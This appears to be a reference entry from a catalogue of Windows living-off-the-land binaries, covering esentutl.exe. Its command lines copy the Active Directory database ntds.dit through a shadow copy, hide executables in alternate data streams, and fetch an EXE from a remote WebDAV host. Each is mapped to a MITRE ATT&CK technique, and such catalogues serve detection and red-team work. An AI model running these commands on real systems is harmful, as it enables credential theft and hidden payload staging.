.. /Esentutl.exe
Star

Binary for working with Microsoft Joint Engine Technology (JET) database


Paths:

Resources:
Acknowledgements:

Detection:

Copy

Copies the source VBS file to the destination VBS file.
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Usecase: Copies files from A to B
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105



Copies a (locked) file using Volume Shadow Copy
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
Usecase: Copy/extract a locked file such as the AD Database
Privileges required: Admin
OS: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
MITRE ATT&CK®: T1003.003



Alternate data streams

Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Copies the source Alternate Data Stream (ADS) to the destination EXE.
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
Usecase: Extract hidden file within alternate data streams
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Download

Copies the source EXE to the destination EXE file
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Usecase: Use to copy files from one unc path to another
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004